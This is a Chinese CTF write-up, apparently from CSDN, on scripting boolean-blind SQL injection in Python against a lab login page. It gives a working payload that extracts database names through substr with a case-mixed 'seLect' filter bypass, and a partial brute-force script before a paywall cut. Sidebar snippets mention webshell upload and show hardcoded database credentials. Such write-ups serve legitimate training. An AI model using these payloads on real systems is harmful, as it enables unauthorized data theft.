【ctf】基于python脚本的sql注入合集(持续更新)

最新推荐文章于 2024-09-11 20:11:09 发布
最新推荐文章于 2024-09-11 20:11:09 发布
阅读量6.3k 收藏 34
点赞数 9
分类专栏: 与君共勉 文章标签: python 网络安全 mysql sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woodwhale/article/details/116770165
版权

基于python脚本的sql注入合集(持续更新)

前言

sql注入在ctf的web方向中是常见题型。简单的sql注入用sqlmap跑一跑自然而然就跑出来了。这篇文章是针对sqlmap跑起来困难的题目,也就是用python写脚本来跑的题目。
那么这种写脚本的题目也有不同的注入方式,例如布尔盲注、时间盲注、异或注入等等,都是通过写脚本来获取sql信息的。这篇文章就写下我认为比较有价值的写脚本题型!

布尔盲注

分析题目

N1BOOK [第一章 web入门]SQL注入-2
在这里插入图片描述

这题其实有很多解法,这里我选择比较简答的布尔盲注来实现。

我们首先进入login.php
在这里插入图片描述
见到登录页面,先试试admin
在这里插入图片描述
发现报错 账号或密码错误

我们在看看其他的用户名
在这里插入图片描述
可以发现报错的是 账号不存在

那么我们可以得出结论
当用户名存在时,输错密码报错 用户名或密码错误
当用户名不存在时,无论密码如何都报错 账号不存在
那么我们可以通过这个回显来判断我们的注入语句是否正确。

拿出我们的bp,给网页抓个包,放入repeater

用admin账号登录,显示
在这里插入图片描述
用不存在的账号登录
在这里插入图片描述

admin:true
{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
woodwhale:false
{“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"}

可以明显看到回显的长度不同,我们把输入admin时的回显视为true,输入不存在的用户名的回显视为false,基于这一点,我们写python脚本

我们再判断是字符型还是数字型
在这里插入图片描述

在这里插入图片描述
回显为true,简单的数字型注入。

在这之后又判断有无过滤,发现select有过滤,用大写即可避开。

爆数据库

对于数据库,我还是得说一句,大部分情况,flag都放在了当前数据库下的某张表中,也就是database(),但是有些题目的flag会放在其他数据库中,所以如果时间充分,我们需要查询所有的数据库。

关键语句

// 查询所有的数据库
(seLect(group_concat(schema_name))from(information_schema.schemata))

当然,因为我们是布尔盲注,所以还有一个关键函数substr,例如 substr(abc,1,1)='a’返回的就是true,substr(str,i,j)的str参数是字符串,i和j表示从第i位开始,第j个字符串。

那么我们可以构造出关键语句

name="admin' and substr((seLect(group_concat(schema_name))from(information_schema.schemata)),{0},1)='{1}' #"
pass="123"

name中的{0}和{1}是python 的format表达式,和%d %s的作用一样,只不过不需要定义形式。
那么我们将上述data放入一个集合中

data = {
   'name':"admin' and substr((seLect(group_concat(schema_name))from(information_schema.schemata)),{0},1)='{1}' #".format(num,i),
        'pass':'123456'}

接着构造脚本

import requests
import time
url = "http://ae08b6be-3b2e-4194-a003-9827cda4497e.node3.buuoj.cn/login.php"
dictionary = '}qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890{'
flag = ""

for num in range(1,500):
    print(num)
    for i in dictionary:
        data = {
   'name':"admin' and substr((seLect(group_concat(schema_name))from(information_schema.schemata)),{0},1)='{1}' #".format(num,i
最低0.47元/天 解锁文章
woodwhale
关注
专栏目录
python 写的一些ctf脚本
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-06 5959
python 写的一些ctf脚本记录 import base64 c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt") for i in c: print(chr((i-16) ^ 32), end="") str = "61666374667B317327745F73305F333435797D" for i in range(0, len(str), 2): print(chr(int("0x"+str[i:i+2], 16)),
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5585
Ctfhub解题 web SQL注入
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6306
关于SQL注入的思维导图可以点开看一下大图
SQL注入+CTF实例
最新发布
hyq99999的博客
09-11 783
sql注入关联的相关知识+CTF实例
sql注入python_Python--sql注入
weixin_39702799的博客
12-15 146
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
CTF-sql注入
am_03的博客
08-23 115
在phpstudy里 #为注释 密码随便输入的 还可以输入admin’#(可注释掉) 注意:有的不让输入特殊字符,因为可以绕过验证 在URL处输入网址,在此工具里打开网页,可以点击右上方的扫描网址或者扫描URL 点击后,弹出的信息右键,点击SQL INJECTION POC, 在上方点击,可以获取它的web环境,数据库,命令执行,文件读取,文件上传等等 在下方点击获取信息可得到更多信息,弹出Version,Server,OS,u...
CTF-SQL注入
weixin_44770698的博客
06-16 5282
CTF-SQL注入题目整理
pythonsql注入
love_parents的博客
09-10 3289
转载自: python SQL注入的解决办法 pythonsql注入 背景 APP爆出一个大Bug,只要在查询框内输入“%”,就会检索出所有的数据,最后有人给出了这样的解决方案,在前端进行验证,禁止用户输入“%”之类的特殊字符。 帅呆了!责任轻易地就甩给了前端! 我反问,如果百分号要进行禁止,那么“*&’“()”要不要进行禁止?“desc、select、from”等关键字要不要禁止?还有“+-”,正则表达式相关的符号要不要禁止?就算输入框禁止了,直接发送http请求又如何禁止?
CTF中的SQL注入
weixin_43906500的博客
02-24 363
1 环境配置 见文章:https://blog.csdn.net/weixin_43906500/article/details/114025507 docker-compose.yml version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 命令执行 docker-compose up -d 2
CTF Web学习(三)----python脚本的编写及应用
网络猿的博客
01-10 2849
CTF Web学习(三) python脚本的编写及应用 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 文章目录CTF Web学习(三)前言一、python编程(一)BugKu web18 秋名山车神(二)BugKu web19 速度要快(三)BugKu web20 cookies欺骗总结 前言 本次学习主要针对python编程。简单得编程。 一、python编程 以下的题都是出自bugku,但是链接不是
CTF--SQL注入
woshisz0413的博客
11-27 409
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTF-SQL注入(Get)
su__xiaoyan的博客
12-22 838
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 实验环境 攻击者:Kali Linux(192.168.100.146) 靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132) 注意:当前靶机中并没有flag值,需要通过靶机上面的SQL注入漏洞获取数据库中的内容,登陆网站后台,利用网站
CTF-Web SQL注入
weixin_52182264的博客
04-26 4423
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTF-sql注入(X-Forwarded-For)
Reaches_r的博客
08-05 309
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
python sql注入脚本_python打造一个分析网站SQL注入脚本
weixin_39600510的博客
12-03 275
1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站7 url="...
ctf题之SQL注入
m0_51644837的博客
12-10 205
CTFer成长之路之CTF中的SQL注入
梦里明明有六趣,觉后空空无大千
02-20 1611
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF-sql注入(get)
不知名白帽的博客
05-24 566
CTF-sql注入(get),实验环境:kali(192.168.20.128),靶机(192.168.20.131)。先探测敏感信息,再用owasp-zap进行漏洞扫描,然后根据漏洞类型,通过sqlmap进行漏洞的漏洞利用,再上传shell反弹权限
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值